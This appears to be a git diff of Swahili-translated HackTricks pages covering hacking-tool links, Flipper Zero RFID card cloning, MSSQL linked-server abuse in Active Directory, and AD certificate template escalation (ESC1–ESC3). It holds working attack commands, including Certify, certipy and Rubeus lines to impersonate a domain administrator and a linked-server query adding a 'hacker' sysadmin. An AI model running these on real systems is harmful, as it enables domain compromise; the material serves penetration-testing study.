* [https://theia-ide.org/](https://theia-ide.org) : IDE ya mtandaoni
|
||||
* [https://theia-ide.org/](https://theia-ide.org) : IDE mtandaoni
|
||||
* [https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/) : Rasilimali za kuanza BugBounties
|
||||
* [https://medium.com/macoclock/jailbreak-and-stuff-kickstart-tools-and-techniques-for-ios-application-pentesting-6fa53a3987ab](https://medium.com/macoclock/jailbreak-and-stuff-kickstart-tools-and-techniques-for-ios-application-pentesting-6fa53a3987ab) : Zana za IOS pentesting
|
||||
* [https://github.com/random-robbie/keywords/blob/master/keywords.txt](https://github.com/random-robbie/keywords/blob/master/keywords.txt) : Maneno muhimu
|
||||
* [https://github.com/ElevenPaths/HomePWN](https://github.com/ElevenPaths/HomePWN) : Kudukua IoT (Wifi, BLE, SSDP, MDNS)
|
||||
* [https://github.com/rackerlabs/scantron](https://github.com/rackerlabs/scantron) : Uchanganuzi wa kiotomatiki
|
||||
* [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) : Orodha hii
|
||||
* Gundi [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* [https://github.com/ElevenPaths/HomePWN](https://github.com/ElevenPaths/HomePWN) : Udukuzi wa IoT (Wifi, BLE, SSDP, MDNS)
|
||||
* [https://github.com/rackerlabs/scantron](https://github.com/rackerlabs/scantron) : uchunguzi wa kiotomatiki
|
||||
* [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) : Orodha hii inalenga kufunika mada zinazohusiana na usalama wa Electron.js.
|
||||
* [https://github.com/serain/bbrecon](https://github.com/serain/bbrecon) : Habari kuhusu mipango ya BB
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -14,6 +14,11 @@ Njia nyingine za kusaidia HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
## Utangulizi
|
||||
|
||||
Kwa habari zaidi kuhusu jinsi vitambulisho vya 125kHz vinavyofanya kazi angalia:
|
||||
|
@ -24,23 +29,23 @@ Kwa habari zaidi kuhusu jinsi vitambulisho vya 125kHz vinavyofanya kazi angalia:
|
|||
|
||||
## Vitendo
|
||||
|
||||
Kwa habari zaidi kuhusu aina hizi za vitambulisho [**soma utangulizi huu**](../pentesting-rfid.md#aina-za-vitambulisho-vya-rfid-za-frekwensi-ndogo-125khz).
|
||||
Kwa habari zaidi kuhusu aina hizi za vitambulisho [**soma utangulizi huu**](../pentesting-rfid.md#low-frequency-rfid-tags-125khz).
|
||||
|
||||
### Soma
|
||||
|
||||
Jaribu **kusoma** habari ya kadi. Kisha unaweza **kuiga**.
|
||||
Jaribu **kusoma** habari ya kadi. Kisha inaweza **kuiga**.
|
||||
|
||||
{% hint style="warning" %}
|
||||
Tafadhali kumbuka kuwa baadhi ya intercoms hujaribu kujilinda kutokana na nakala za funguo kwa kutuma amri ya kuandika kabla ya kusoma. Ikiwa andiko linafaulu, kadi hiyo inachukuliwa kuwa bandia. Wakati Flipper inaiga RFID hakuna njia ya msomaji kutofautisha kati yake na ile ya asili, hivyo hakuna matatizo kama hayo yanatokea.
|
||||
Tafadhali kumbuka kuwa baadhi ya intercoms hujaribu kujilinda kutokana na nakala za funguo kwa kutuma amri ya kuandika kabla ya kusoma. Ikiwa andiko linafaulu, kadi hiyo inachukuliwa kuwa bandia. Wakati Flipper inaiga RFID hakuna njia ya msomaji kutofautisha kati yake na ile ya asili, hivyo matatizo kama hayo hayatokei.
|
||||
{% endhint %}
|
||||
|
||||
### Ongeza Kwa Mikono
|
||||
### Ongeza Kwa Mkono
|
||||
|
||||
Unaweza kuunda **kadi bandia kwenye Flipper Zero ikionyesha data** uliyoingiza kwa mikono kisha kuiga.
|
||||
Unaweza kuunda **kadi bandia kwenye Flipper Zero ikionyesha data** uliyoingiza kwa mkono na kisha kuiga.
|
||||
|
||||
#### Vitambulisho kwenye kadi
|
||||
|
||||
Wakati mwingine, unapopata kadi utapata kitambulisho (au sehemu) yake imeandikwa kwenye kadi inayoonekana.
|
||||
Wakati mwingine, unapopata kadi utapata kitambulisho (au sehemu) chake kimeandikwa kwenye kadi inayoonekana.
|
||||
|
||||
* **EM Marin**
|
||||
|
||||
|
@ -57,12 +62,17 @@ Hali kama hiyo hutokea kwenye kadi hii ya HID ambapo ni 2 kati ya 3 ya byte zina
|
|||
|
||||
### Iga/Andika
|
||||
|
||||
Baada ya **kukopi** kadi au **kuingiza** kitambulisho **kwa mikono** inawezekana ku**iga** kwa Flipper Zero au **kuandika** kwenye kadi halisi.
|
||||
Baada ya **kunakili** kadi au **kuingiza** kitambulisho **kwa mkono** inawezekana **kuiga** kwa Flipper Zero au **kuandika** kwenye kadi halisi.
|
||||
|
||||
## Marejeo
|
||||
|
||||
* [https://blog.flipperzero.one/rfid/](https://blog.flipperzero.one/rfid/)
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
|
|
@ -1,18 +1,23 @@
|
|||
# Kutumia MSSQL kwenye AD
|
||||
# Kudanganya AD MSSQL
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikionekana kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Je! Unafanya kazi katika **kampuni ya usalama wa mtandao**? Je! Unataka kuona **kampuni yako ikionekana kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Pata [**swagi rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
## **Uthibitishaji / Ugunduzi wa MSSQL**
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
## **Uorodheshaji / Ugunduzi wa MSSQL**
|
||||
|
||||
Moduli ya powershell [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) ni muhimu sana katika kesi hii.
|
||||
```powershell
|
||||
|
@ -51,7 +56,7 @@ Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
|
|||
# Get DBs, test connections and get info in oneliner
|
||||
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
|
||||
```
|
||||
## Kutumia MSSQL Kwa Msingi
|
||||
## Matumizi Makuu ya MSSQL
|
||||
|
||||
### Kufikia DB
|
||||
```powershell
|
||||
|
@ -78,9 +83,9 @@ Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResu
|
|||
[pentesting-mssql-microsoft-sql-server](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Viungo Vilivyothibitishwa vya MSSQL
|
||||
## Viungo Vinavyoaminika vya MSSQL
|
||||
|
||||
Ikiwa kipengee cha MSSQL kinaaminika (kiungo cha database) na kipengee kingine cha MSSQL. Ikiwa mtumiaji ana mamlaka juu ya database iliyothibitishwa, ataweza **kutumia uhusiano wa kuaminika kutekeleza maswali pia kwenye kipengee kingine**. Viungo hivi vinaweza kuunganishwa na kufikia hatua ambapo mtumiaji anaweza kupata database iliyo na mipangilio isiyosahihi ambapo anaweza kutekeleza amri.
|
||||
Ikiwa kipengee cha MSSQL kinaaminika (kiungo cha database) na kipengee kingine cha MSSQL. Ikiwa mtumiaji ana mamlaka juu ya database iliyothibitishwa, ataweza **kutumia uhusiano wa kuaminika kutekeleza maswali pia kwenye kipengee kingine**. Viungo hivi vinaweza kuunganishwa na kwa wakati fulani mtumiaji anaweza kupata database iliyo na usanidi mbaya ambapo anaweza kutekeleza amri.
|
||||
|
||||
**Viungo kati ya databases hufanya kazi hata kati ya uaminifu wa misitu.**
|
||||
|
||||
|
@ -130,7 +135,7 @@ Tambua kuwa metasploit itajaribu kutumia tu kazi ya `openquery()` katika MSSQL (
|
|||
|
||||
### Kwa Mkono - Openquery()
|
||||
|
||||
Kutoka kwa **Linux** unaweza kupata kabati la koni la MSSQL na **sqsh** na **mssqlclient.py.**
|
||||
Kutoka kwa **Linux** unaweza kupata kabati la konsoli la MSSQL na **sqsh** na **mssqlclient.py.**
|
||||
|
||||
Kutoka kwa **Windows** unaweza pia kupata viungo na kutekeleza amri kwa mkono ukitumia **mteja wa MSSQL kama** [**HeidiSQL**](https://www.heidisql.com)
|
||||
|
||||
|
@ -150,7 +155,7 @@ Tekeleza maswali kupitia kiungo (mfano: pata viungo zaidi katika kifaa kipya kin
|
|||
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
|
||||
```
|
||||
{% hint style="warning" %}
|
||||
Angalia mahali ambapo alama za nukuu mbili na moja hutumiwa, ni muhimu kutumia hizo njia.
|
||||
Angalia mahali ambapo alama za nukuu mbili na moja zinatumika, ni muhimu kutumia hizo njia.
|
||||
{% endhint %}
|
||||
|
||||
![](<../../.gitbook/assets/image (640).png>)
|
||||
|
@ -175,6 +180,22 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
|
|||
|
||||
**Mtumiaji wa ndani wa MSSQL** kawaida ana aina maalum ya mamlaka inayoitwa **`SeImpersonatePrivilege`**. Hii inaruhusu akaunti hiyo "kujifanya kuwa mteja baada ya uwakilishi".
|
||||
|
||||
Stratejia ambayo waandishi wengi wamebuni ni kulazimisha huduma ya SYSTEM kujithibitisha kwa huduma ya kijanja au ya kati ambayo mkaidi hujenga. Huduma hii ya mkaidi inaweza kujifanya kuwa huduma ya SYSTEM wakati inajaribu kujithibitisha.
|
||||
Stratejia ambayo waandishi wengi wamebuni ni kulazimisha huduma ya SYSTEM kujithibitisha kwa huduma ya udanganyifu au ya kati ambayo mkaidi hujenga. Huduma hii ya udanganyifu inaweza kujifanya kuwa huduma ya SYSTEM wakati inajaribu kujithibitisha.
|
||||
|
||||
[SweetPotato](https://github.com/CCob/SweetPotato) ina mkusanyiko wa njia hizi mbalimbali ambazo zinaweza kutekelezwa kupitia amri ya `execute-assembly` ya Beacon.
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
|
@ -14,6 +14,10 @@ Njia nyingine za kusaidia HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
**Hii ni muhtasari wa sehemu za mbinu za kupanda kwa machapisho:**
|
||||
|
||||
* [https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified\_Pre-Owned.pdf](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified\_Pre-Owned.pdf)
|
||||
|
@ -31,21 +35,21 @@ Njia nyingine za kusaidia HackTricks:
|
|||
* **Hakuna saini kutoka kwa wafanyikazi walioruhusiwa inahitajika.**
|
||||
* **Maelezo ya usalama kwenye templeti za cheti ni ya kutoa ruhusa sana, kuruhusu watumiaji wenye mamlaka ndogo kupata haki za kujiandikisha.**
|
||||
* **Templeti za cheti zimepangwa kufafanua EKUs ambazo hufanikisha uwakilishi:**
|
||||
* Vitambulisho vya Matumizi ya Msingi (EKU) kama Uthibitishaji wa Mteja (OID 1.3.6.1.5.5.7.3.2), Uthibitishaji wa Mteja wa PKINIT (1.3.6.1.5.2.3.4), Ingia kwa Kadi ya Smart (OID 1.3.6.1.4.1.311.20.2.2), Kusudi Lolote (OID 2.5.29.37.0), au hakuna EKU (SubCA) zimejumuishwa.
|
||||
* **Uwezo wa waombaji kujumuisha jina la Alt ya Mada katika Ombi la Kusaini Cheti (CSR) unaruhusiwa na templeti:**
|
||||
* Active Directory (AD) inapendelea jina la Alt ya Mada (SAN) kwenye cheti kwa uthibitisho wa utambulisho ikiwa ipo. Hii inamaanisha kwamba kwa kufafanua SAN katika CSR, cheti linaweza kuombwa kujifanya kuwa mtumiaji yeyote (k.m., msimamizi wa kikoa). Ikiwa SAN inaweza kufafanuliwa na mwombaji inaonyeshwa kwenye mali ya AD ya templeti ya cheti kupitia mali ya `mspki-certificate-name-flag`. Mali hii ni bitmask, na uwepo wa bendera ya `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` inaruhusu ufafanuzi wa SAN na mwombaji.
|
||||
* Vitambulisho vya Matumizi ya Msingi wa Kigeni (EKU) kama Uthibitishaji wa Mteja (OID 1.3.6.1.5.5.7.3.2), Uthibitishaji wa Mteja wa PKINIT (1.3.6.1.5.2.3.4), Kuingia kwa Kadi ya Smart (OID 1.3.6.1.4.1.311.20.2.2), Kusudi Lolote (OID 2.5.29.37.0), au hakuna EKU (SubCA) zimejumuishwa.
|
||||
* **Uwezo wa wanaomba kujumuisha subjectAltName katika Ombi la Kusaini Cheti (CSR) unaruhusiwa na templeti:**
|
||||
* Active Directory (AD) inapendelea subjectAltName (SAN) kwenye cheti kwa uthibitisho wa utambulisho ikiwa ipo. Hii inamaanisha kwamba kwa kufafanua SAN katika CSR, cheti linaweza kuombwa kujifanya kuwa mtumiaji yeyote (k.m., msimamizi wa kikoa). Ikiwa SAN inaweza kufafanuliwa na muombaji inaonyeshwa kwenye mali ya AD ya templeti ya cheti kupitia mali ya `mspki-certificate-name-flag`. Mali hii ni bitmask, na uwepo wa bendera ya `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` inaruhusu ufafanuzi wa SAN na muombaji.
|
||||
|
||||
{% hint style="danger" %}
|
||||
Usanidi ulioelezwa unaruhusu watumiaji wenye mamlaka ndogo kuomba vyeti vyenye SAN yoyote wanayotaka, kuruhusu uthibitisho kama mwakilishi yeyote wa kikoa kupitia Kerberos au SChannel.
|
||||
Usanidi uliobainishwa unaruhusu watumiaji wenye mamlaka ndogo kuomba vyeti vyenye SAN yoyote wanayotaka, kuruhusu uthibitisho kama mwakilishi yeyote wa kikoa kupitia Kerberos au SChannel.
|
||||
{% endhint %}
|
||||
|
||||
Kipengele hiki mara nyingine kimeamilishwa kusaidia uzalishaji wa haraka wa vyeti vya HTTPS au mwenyeji na bidhaa au huduma za kupeleka, au kutokana na ukosefu wa uelewa.
|
||||
Kipengele hiki mara nyingine kinaamilishwa kusaidia uzalishaji wa haraka wa vyeti vya HTTPS au mwenyeji na bidhaa au huduma za kupeleka, au kutokana na ukosefu wa uelewa.
|
||||
|
||||
Inabainishwa kwamba kuunda cheti na chaguo hili kunasababisha onyo, ambalo sio kesi wakati templeti ya cheti iliyopo (kama templeti ya `WebServer`, ambayo ina `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` imeamilishwa) inadaiwa kisha kuhaririwa kujumuisha OID ya uthibitishaji.
|
||||
Inabainishwa kwamba kuunda cheti na chaguo hili kunasababisha onyo, ambalo sio kesi wakati templeti ya cheti iliyopo (kama templeti ya `WebServer`, ambayo ina `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` imewezeshwa) inadaiwa na kisha kurekebishwa kujumuisha OID ya uthibitishaji.
|
||||
|
||||
### Mabaya
|
||||
|
||||
Kutafuta **templeti za cheti zilizodhaifu** unaweza kukimbia:
|
||||
Kutafuta **templeti za cheti zilizoweza kudhurika** unaweza kukimbia:
|
||||
```bash
|
||||
Certify.exe find /vulnerable
|
||||
certipy find -username john@corp.local -password Passw0rd -dc-ip 172.16.126.128
|
||||
|
@ -55,22 +59,22 @@ Kutumia **udhaifu huu kujifanya kuwa msimamizi**, mtu anaweza kukimbia:
|
|||
Certify.exe request /ca:dc.domain.local-DC-CA /template:VulnTemplate /altname:localadmin
|
||||
certipy req -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -template 'ESC1' -upn 'administrator@corp.local'
|
||||
```
|
||||
Kisha unaweza kubadilisha **cheti kilichozalishwa kuwa muundo wa `.pfx`** na kutumia kwa **uthibitishaji kwa kutumia Rubeus au certipy** tena:
|
||||
Kisha unaweza kubadilisha **cheti kilichozalishwa kuwa muundo wa `.pfx`** na kutumia kuthibitisha kutumia **Rubeus au certipy** tena:
|
||||
```bash
|
||||
Rubeus.exe asktgt /user:localdomain /certificate:localadmin.pfx /password:password123! /ptt
|
||||
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'corp.local' -dc-ip 172.16.19.100
|
||||
```
|
||||
Windows binaries "Certreq.exe" & "Certutil.exe" zinaweza kutumika kuzalisha PFX: https://gist.github.com/b4cktr4ck2/95a9b908e57460d9958e8238f85ef8ee
|
||||
|
||||
Uchambuzi wa templeti za vyeti ndani ya schema ya usanidi wa AD Forest, hasa zile ambazo hazihitaji idhini au saini, zenye Kibali cha Mteja cha uthibitishaji au Kadi ya Akili ya Kuingia, na na bendera ya `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` iliyowezeshwa, inaweza kufanywa kwa kukimbia swali la LDAP lifuatalo:
|
||||
Uchambuzi wa templeti za vyeti ndani ya schema ya usanidi wa AD Forest, hasa zile ambazo hazihitaji idhini au saini, zenye Kibali cha Mteja cha uthibitishaji au Kuingia kwa Kadi ya Akili EKU, na na bendera ya `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` kuwezeshwa, inaweza kufanywa kwa kukimbia swali la LDAP lifuatalo:
|
||||
```
|
||||
(&(objectclass=pkicertificatetemplate)(!(mspki-enrollmentflag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-rasignature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2)(pkiextendedkeyusage=1.3.6.1.5.2.3.4)(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*)))(mspkicertificate-name-flag:1.2.840.113556.1.4.804:=1))
|
||||
```
|
||||
## Templeti za Cheti Zilizopangwa Visivyo Sawa - ESC2
|
||||
## Templeti za Cheti Zilizowekwa vibaya - ESC2
|
||||
|
||||
### Maelezo
|
||||
|
||||
Skenario ya unyanyasaji wa pili ni tofauti na ile ya kwanza:
|
||||
Skenario la unyanyasaji la pili ni tofauti na la kwanza:
|
||||
|
||||
1. Haki za usajili zinatolewa kwa watumiaji wenye mamlaka ndogo na Enterprise CA.
|
||||
2. Mahitaji ya idhini ya meneja yamelemazwa.
|
||||
|
@ -78,13 +82,13 @@ Skenario ya unyanyasaji wa pili ni tofauti na ile ya kwanza:
|
|||
4. Msimamizi wa usalama ulio na ruhusa kubwa kwenye templeti ya cheti unatoa haki za usajili wa cheti kwa watumiaji wenye mamlaka ndogo.
|
||||
5. **Templeti ya cheti imefafanuliwa kujumuisha EKU ya Any Purpose au hakuna EKU.**
|
||||
|
||||
**EKU ya Any Purpose** inaruhusu cheti kupatikana na mshambuliaji kwa **madhumuni yoyote**, ikiwa ni pamoja na uthibitisho wa mteja, uthibitisho wa seva, sahihi ya nambari, n.k. **Mbinu ile ile iliyotumika kwa ESC3** inaweza kutumika kudukua hali hii.
|
||||
**EKU ya Any Purpose** inaruhusu cheti kupatikana na mshambuliaji kwa **madhumuni yoyote**, ikiwa ni pamoja na uthibitisho wa mteja, uthibitisho wa seva, sahihi ya nambari, n.k. **Mbinu ile ile iliyotumika kwa ESC3** inaweza kutumika kudanganya hali hii.
|
||||
|
||||
Cheti **bila EKUs**, ambacho hufanya kazi kama vyeti vya CA vya chini, vinaweza kutumiwa kwa **madhumuni yoyote** na vinaweza **pia kutumika kusaini vyeti vipya**. Hivyo, mshambuliaji anaweza kubainisha EKUs au sehemu za cheti katika vyeti vipya kwa kutumia cheti cha CA ya chini.
|
||||
Cheti zenye **hakuna EKUs**, ambazo hufanya kazi kama vyeti vya CA vinavyoshirikiana, zinaweza kutumiwa kwa **madhumuni yoyote** na zinaweza **pia kutumika kusaini vyeti vipya**. Hivyo, mshambuliaji anaweza kubainisha EKUs au sehemu za vyeti vipya kwa kutumia cheti cha CA msaidizi.
|
||||
|
||||
Hata hivyo, vyeti vipya vilivyoundwa kwa **uthibitisho wa uwanja** hautafanya kazi ikiwa CA ya chini haijatambuliwa na kitu cha **`NTAuthCertificates`**, ambacho ni mipangilio ya msingi. Hata hivyo, mshambuliaji bado anaweza kuunda **vyeti vipya vyenye EKU yoyote** na thamani za cheti za kiholela. Hivi vinaweza **kudukuliwa** kwa madhumuni mbalimbali (k.m., sahihi ya nambari, uthibitisho wa seva, n.k.) na vinaweza kuwa na athari kubwa kwa programu nyingine kwenye mtandao kama vile SAML, AD FS, au IPSec.
|
||||
Hata hivyo, vyeti vipya vilivyoundwa kwa **uthibitisho wa kikoa** hautafanya kazi ikiwa CA msaidizi haitoshiwa na kipengee cha **`NTAuthCertificates`**, ambacho ni mipangilio ya msingi. Hata hivyo, mshambuliaji bado anaweza kuunda **vyeti vipya vyenye EKU yoyote** na thamani za vyeti za kubahatisha. Hivi vinaweza **kutumiwa vibaya** kwa madhumuni mbalimbali (k.m., sahihi ya nambari, uthibitisho wa seva, n.k.) na inaweza kuwa na athari kubwa kwa programu nyingine kwenye mtandao kama vile SAML, AD FS, au IPSec.
|
||||
|
||||
Kutambua templeti zinazolingana na hali hii ndani ya mpangilio wa msitu wa AD, swali lifuatalo la LDAP linaweza kutekelezwa:
|
||||
Kutambua templeti zinazolingana na hali hii ndani ya mpangilio wa msitu wa AD, swali la LDAP lifuatalo linaweza kutekelezwa:
|
||||
```
|
||||
(&(objectclass=pkicertificatetemplate)(!(mspki-enrollmentflag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-rasignature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))
|
||||
```
|
||||
|
@ -100,23 +104,19 @@ Hali hii ni kama ya kwanza na ya pili lakini **ikichukua faida** ya **EKU tofaut
|
|||
|
||||
**Mahitaji 1:**
|
||||
|
||||
* Haki za usajili zinatolewa kwa watumiaji wenye mamlaka ya chini na Enterprise CA.
|
||||
* Mahitaji ya idhini ya meneja hayapo.
|
||||
* Haki za usajili zinatolewa kwa watumiaji walio na mamlaka ndogo na CA ya Kampuni.
|
||||
* Mahitaji ya idhini ya meneja yanapuuzwa.
|
||||
* Hakuna mahitaji ya saini zilizoidhinishwa.
|
||||
* Msimbo wa usalama wa templeti ya cheti ni wa kutoa ruhusa kupita kiasi, ukitoa haki za usajili kwa watumiaji wenye mamlaka ya chini.
|
||||
* Templeti ya cheti inajumuisha EKU ya Mwombaji wa Cheti, ikiruhusu ombi la templeti zingine za cheti kwa niaba ya wakala wengine.
|
||||
